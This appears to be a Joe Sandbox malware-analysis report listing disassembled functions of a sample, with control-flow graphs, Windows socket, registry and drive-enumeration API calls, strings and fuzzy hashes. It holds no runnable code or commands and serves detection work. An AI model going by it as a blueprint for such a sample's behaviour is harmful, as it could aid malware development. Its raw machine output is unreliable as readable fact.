                                    • Instruction Fuzzy Hash: C23294F5904211EBFB11AB24FC46A2B76E4AF54314F084838FA4996263F779ED14C793
                                    Function 006A8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1309 6a8b50-6a8b69 1310 6a8b6b-6a8b74 1309->1310 1311 6a8be6 1309->1311 1313 6a8beb-6a8bf2 1310->1313 1314 6a8b76-6a8b8d 1310->1314 1312 6a8be9 1311->1312 1312->1313 1315 6a8b8f-6a8ba7 call 686e40 1314->1315 1316 6a8bf3-6a8bfe call 6aa550 1314->1316 1323 6a8cd9-6a8d16 SleepEx getsockopt 1315->1323 1324 6a8bad-6a8baf 1315->1324 1321 6a8de4-6a8def 1316->1321 1322 6a8c04-6a8c08 1316->1322 1325 6a8e8c-6a8e95 1321->1325 1326 6a8df5-6a8e19 call 6aa150 1321->1326 1327 6a8c0e-6a8c1d 1322->1327 1328 6a8dbd-6a8dc3 1322->1328 1331 6a8d18-6a8d20 1323->1331 1332 6a8d22 1323->1332 1329 6a8ca6-6a8cb0 1324->1329 1330 6a8bb5-6a8bb9 1324->1330 1334 6a8f00-6a8f06 1325->1334 1335 6a8e97-6a8e9c 1325->1335 1368 6a8e1b-6a8e26 1326->1368 1369 6a8e88 1326->1369 1337 6a8c1f-6a8c30 connect 1327->1337 1338 6a8c35-6a8c48 call 6aa150 1327->1338 1328->1312 1329->1323 1339 6a8cb2-6a8cb8 1329->1339 1330->1313 1340 6a8bbb-6a8bc2 1330->1340 1333 6a8d26-6a8d39 1331->1333 1332->1333 1342 6a8d3b-6a8d3d 1333->1342 1343 6a8d43-6a8d61 call 68d8c0 call 6aa150 1333->1343 1334->1313 1344 6a8e9e-6a8eb6 call 682a00 1335->1344 1345 6a8edf-6a8eef call 6778b0 1335->1345 1337->1338 1370 6a8c4d-6a8c4f 1338->1370 1347 6a8cbe-6a8cd4 call 6ab180 1339->1347 1348 6a8ddc-6a8dde 1339->1348 1340->1313 1349 6a8bc4-6a8bcc 1340->1349 1342->1343 1342->1348 1372 6a8d66-6a8d74 1343->1372 1344->1345 1367 6a8eb8-6a8edd call 683410 * 2 1344->1367 1365 6a8ef2-6a8efc 1345->1365 1347->1321 1348->1312 1348->1321 1355 6a8bce-6a8bd2 1349->1355 1356 6a8bd4-6a8bda 1349->1356 1355->1313 1355->1356 1356->1313 1357 6a8bdc-6a8be1 1356->1357 1364 6a8dac-6a8db8 call 6b50a0 1357->1364 1364->1313 1365->1334 1367->1365 1374 6a8e28-6a8e2c 1368->1374 1375 6a8e2e-6a8e85 call 68d090 call 6b4fd0 1368->1375 1369->1325 1376 6a8c8e-6a8c93 1370->1376 1377 6a8c51-6a8c58 1370->1377 1372->1313 1383 6a8d7a-6a8d81 1372->1383 1374->1369 1374->1375 1375->1369 1381 6a8dc8-6a8dd9 call 6ab100 1376->1381 1382 6a8c99-6a8c9f 1376->1382 1377->1376 1379 6a8c5a-6a8c62 1377->1379 1386 6a8c6a-6a8c70 1379->1386 1387 6a8c64-6a8c68 1379->1387 1381->1348 1382->1329 1383->1313 1389 6a8d87-6a8d8f 1383->1389 1386->1376 1391 6a8c72-6a8c8b call 6b50a0 1386->1391 1387->1376 1387->1386 1393 6a8d9b-6a8da1 1389->1393 1394 6a8d91-6a8d95 1389->1394 1391->1376 1393->1313 1398 6a8da7 1393->1398 1394->1313 1394->1393 1398->1364
                                    APIs
                                    • connect.WS2_32(?,?,00000001), ref: 006A8C30
                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 006A8CF3
                                    • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 006A8D0E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: Sleepconnectgetsockopt
                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                    • API String ID: 1669343778-879669977
                                    • Opcode ID: 69d65bfb62bdfb859e85baed0f859005b61be9928978801c55402ff9df6e69f5
                                    • Instruction ID: 8d0385728c85b99fe567846eacca37e03f197c16599a6813704f548f508c347b
                                    • Opcode Fuzzy Hash: 69d65bfb62bdfb859e85baed0f859005b61be9928978801c55402ff9df6e69f5
                                    • Instruction Fuzzy Hash: 18B1C070604706AFDB10EF24C885BA6B7E2AF56314F04856CE85A4B3D2DB71EC54CF62
                                    Function 00672F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1495 672f17-672f8c call afeb30 call afef20 1500 6731c9-6731cd 1495->1500 1501 6731d3-6731d6 1500->1501 1502 672f91-672ff4 call 671619 RegOpenKeyExA 1500->1502 1505 6731c5 1502->1505 1506 672ffa-67300b 1502->1506 1505->1500 1507 67315c-6731ac RegEnumKeyExA 1506->1507 1508 6731b2-6731c2 1507->1508 1509 673010-673083 call 671619 RegOpenKeyExA 1507->1509 1508->1505 1513 67314e-673152 1509->1513 1514 673089-6730d4 RegQueryValueExA 1509->1514 1513->1507 1515 6730d6-673137 call afee00 call afee90 call afef20 call afed30 call afef20 call afd2a0 1514->1515 1516 67313b-67314b RegCloseKey 1514->1516 1515->1516 1516->1513
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: EnumOpen
                                    • String ID: d
                                    • API String ID: 3231578192-2564639436
                                    • Opcode ID: 1c8687020bcdd67ba5f66596051683e8d9c689f5fb1049ee0fb7332b9cee1a4a
                                    • Instruction ID: fba076207537aafca5c6832949c23252b447179644c3d2bc823ed79b6c0c7f9d
                                    • Opcode Fuzzy Hash: 1c8687020bcdd67ba5f66596051683e8d9c689f5fb1049ee0fb7332b9cee1a4a
                                    • Instruction Fuzzy Hash: 4871C4B49043199FDB00EF68D58479EBBF1BF84308F10886DE89897315E7749A888F92
                                    Function 006776A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1529 6776a0-6776be 1530 6776e6-6776f2 send 1529->1530 1531 6776c0-6776c7 1529->1531 1533 6776f4-677709 call 6772a0 1530->1533 1534 67775e-677762 1530->1534 1531->1530 1532 6776c9-6776d1 1531->1532 1535 6776d3-6776e4 1532->1535 1536 67770b-677759 call 6772a0 call 67cb20 call 9f8c50 1532->1536 1533->1534 1535->1533 1536->1534
                                    APIs
                                    • send.WS2_32(multi.c,?,?,?,N=g,00000000,?,?,006807BF), ref: 006776EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID: LIMIT %s:%d %s reached memlimit$N=g$SEND %s:%d send(%lu) = %ld$multi.c$send
                                    • API String ID: 2809346765-379084146
                                    • Opcode ID: 41a6f1387f988e8ed7a06922ac5697c370a7b639f9800065bbd7ca9d3f4b5b34
                                    • Instruction ID: 47e7853ce78a6586357174791ed47189402c2c8dc73f44deb036123bcc4b0265
                                    • Opcode Fuzzy Hash: 41a6f1387f988e8ed7a06922ac5697c370a7b639f9800065bbd7ca9d3f4b5b34
                                    • Instruction Fuzzy Hash: 82112CB5A293487BD1109756AC8AE2B3B5DDBC2B68F450919FC0C57383D5729D0087B1
                                    Function 006A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1648 6a9290-6a92ed call 6776a0 1651 6a93c3-6a93ce 1648->1651 1652 6a92f3-6a92fb 1648->1652 1661 6a93d0-6a93e1 1651->1661 1662 6a93e5-6a9427 call 68d090 call 6b4f40 1651->1662 1653 6a93aa-6a93af 1652->1653 1654 6a9301-6a9333 call 68d8c0 call 68d9a0 1652->1654 1655 6a9456-6a9470 1653->1655 1656 6a93b5-6a93bc 1653->1656 1672 6a93a7 1654->1672 1673 6a9335-6a9364 WSAIoctl 1654->1673 1659 6a9429-6a9431 1656->1659 1660 6a93be 1656->1660 1666 6a9439-6a943f 1659->1666 1667 6a9433-6a9437 1659->1667 1660->1655 1661->1656 1668 6a93e3 1661->1668 1662->1655 1662->1659 1666->1655 1671 6a9441-6a9453 call 6b50a0 1666->1671 1667->1655 1667->1666 1668->1655 1671->1655 1672->1653 1676 6a939b-6a93a4 1673->1676 1677 6a9366-6a936f 1673->1677 1676->1672 1677->1676 1680 6a9371-6a9390 setsockopt 1677->1680 1680->1676 1681 6a9392-6a9395 1680->1681 1681->1676
                                    APIs
                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 006A935D
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 006A9389
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: Ioctlsetsockopt
                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                    • API String ID: 1903391676-2691795271
                                    • Opcode ID: f8e2c860be26c41437c56ce4884e277b7ebe67e7113d98fbe28f1f6ed2831db8
                                    • Instruction ID: 51f2fe417c9aaa53eebd3456f49eb64de4ac5e2c02eb1d42f24f5a9cc7be10e9
                                    • Opcode Fuzzy Hash: f8e2c860be26c41437c56ce4884e277b7ebe67e7113d98fbe28f1f6ed2831db8
                                    • Instruction Fuzzy Hash: 7151B370600305ABEB10EF24C881FAA77A6FF8A314F248569FD489B382D731ED51CB61
                                    Function 07420190 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 373COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1682 7420190-7420433 GetLogicalDrives 1709 7420449-74206ef call 742064f 1682->1709
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\$ZXZX
                                    • API String ID: 999431828-590421744
                                    • Opcode ID: e9668bbcca0d5a7b974e7f1a3dce7bd857d84b9b19a8f4c9fc691315853abe6e
                                    • Instruction ID: a2db029a940ba6ff9d8dc0e10e805127618558f0bb617f40a19de314666ffe4a
                                    • Opcode Fuzzy Hash: e9668bbcca0d5a7b974e7f1a3dce7bd857d84b9b19a8f4c9fc691315853abe6e
                                    • Instruction Fuzzy Hash: 92615EEB26D131BE7142C1816B14AFB67AEE5C7730BB1C827F807D6512E2984E6B7035
                                    Function 00677770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1739 677770-67778e 1740 6777b6-6777c2 recv 1739->1740 1741 677790-677797 1739->1741 1743 6777c4-6777d9 call 6772a0 1740->1743 1744 67782e-677832 1740->1744 1741->1740 1742 677799-6777a1 1741->1742 1745 6777a3-6777b4 1742->1745 1746 6777db-677829 call 6772a0 call 67cb20 call 9f8c50 1742->1746 1743->1744 1745->1743 1746->1744
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: recv
                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                    • API String ID: 1507349165-640788491
                                    • Opcode ID: 11217d119e7dccfb34fb73e8f4d9e4817a9094e50d7e815cce8d9a5235f4b90c
                                    • Instruction ID: 3d4f14de873e890d5dd787123b5c30eec5894fa34c1eb92cf028fe8bf4a65cae
                                    • Opcode Fuzzy Hash: 11217d119e7dccfb34fb73e8f4d9e4817a9094e50d7e815cce8d9a5235f4b90c
                                    • Instruction Fuzzy Hash: BF113AB9A183447BE110D7119C4AE2B7B5DDBC6B68F05492DFC0C53382D1719C0086B2
                                    Function 006775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1758 6775e0-6775ed 1759 677607-677629 socket 1758->1759 1760 6775ef-6775f6 1758->1760 1761 67763f-677642 1759->1761 1762 67762b-67763c call 6772a0 1759->1762 1760->1759 1763 6775f8-6775ff 1760->1763 1762->1761 1765 677643-677699 call 6772a0 call 67cb20 call 9f8c50 1763->1765 1766 677601-677602 1763->1766 1766->1759
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                    • API String ID: 98920635-842387772
                                    • Opcode ID: 3259b650cb13e2512c410798dba41a321d68658bd35e77b77f824b0ccb7a8f99
                                    • Instruction ID: e436abc2a215a6d017df2a7db3d6d12309ad983893ec9090a8b89ff72180ebb3
                                    • Opcode Fuzzy Hash: 3259b650cb13e2512c410798dba41a321d68658bd35e77b77f824b0ccb7a8f99
                                    • Instruction Fuzzy Hash: AE112576A2039227DA10566AAC1BFDB3B89DBC2724F054925F818963D3D2328D94D3E1
                                    Function 0742000B Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 522COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1776 742000b-742002a 1779 742003b-742004e 1776->1779 1781 7420039 1779->1781 1782 742004f-7420433 call 7420132 GetLogicalDrives 1779->1782 1781->1779 1824 7420449-74206ef call 742064f 1782->1824
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: a4eb0508af9d0704d275c9e8895779e98fb49ea8e3fd83a78198c1750d5d0749
                                    • Instruction ID: 0a268c86c7b188696a471c6bea088c1a01a2e7d059d27f9f7e145ba863a80479
                                    • Opcode Fuzzy Hash: a4eb0508af9d0704d275c9e8895779e98fb49ea8e3fd83a78198c1750d5d0749
                                    • Instruction Fuzzy Hash: 34A16EEB26C131BD714281452B14AFB6BAEE5C7730BB1C82BF807D6516E2984E6F7035
                                    Function 07420000 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 510COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1854 7420000-742002a 1857 742003b-742004e 1854->1857 1859 7420039 1857->1859 1860 742004f-7420433 call 7420132 GetLogicalDrives 1857->1860 1859->1857 1902 7420449-74206ef call 742064f 1860->1902
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 2615d13aa38052a10c7fdb61df0cce6f3fd79bb102ed4bffefe75b32dbc01aad
                                    • Instruction ID: 6834e0d4703acb3ac5cfa26eab59d84566db6a9fcd5f1570206f9ea6b7e35f3d
                                    • Opcode Fuzzy Hash: 2615d13aa38052a10c7fdb61df0cce6f3fd79bb102ed4bffefe75b32dbc01aad
                                    • Instruction Fuzzy Hash: C4A15CEB26C131BD7142C1452B14AFB6AAEE5C7730BB1C82BF807D6512E2984E6B7035
                                    Function 07420046 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 507COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1932 7420046-7420049 1933 742004c-742004e 1932->1933 1934 7420039-7420040 1933->1934 1935 742004f-7420433 call 7420132 GetLogicalDrives 1933->1935 1934->1933 1978 7420449-74206ef call 742064f 1935->1978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 4e91b62e4f7f4e352a7a2f20154e6029268447369ecaa2fdd667da5469e1c78d
                                    • Instruction ID: b08539da7cce56813a2548495bb3dc3393bce0e79947de1a15aeb262e85889d0
                                    • Opcode Fuzzy Hash: 4e91b62e4f7f4e352a7a2f20154e6029268447369ecaa2fdd667da5469e1c78d
                                    • Instruction Fuzzy Hash: 87A15DEB26D131BD714281452B14AFB6BAEE5C7730BB1C82BF807D6512E2984E6F7035
                                    Function 07420037 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 500COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2008 7420037-7420038 2009 742003b-742004e 2008->2009 2011 7420039 2009->2011 2012 742004f-7420433 call 7420132 GetLogicalDrives 2009->2012 2011->2009 2054 7420449-74206ef call 742064f 2012->2054
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 077e992ab282ec1c1b93f6cbc566a91f46d03eac0286dd9b4b8db9fe7e0e0bbd
                                    • Instruction ID: 052c408d51f77e08bf5d4c0d609fd57d0e27d4327e3c5c7057a7b97457d0ca27
                                    • Opcode Fuzzy Hash: 077e992ab282ec1c1b93f6cbc566a91f46d03eac0286dd9b4b8db9fe7e0e0bbd
                                    • Instruction Fuzzy Hash: 7D914DEB26D131BD714281452B14AFB6BAEE5C7730BB1C827F807D6512E2984E6F7035
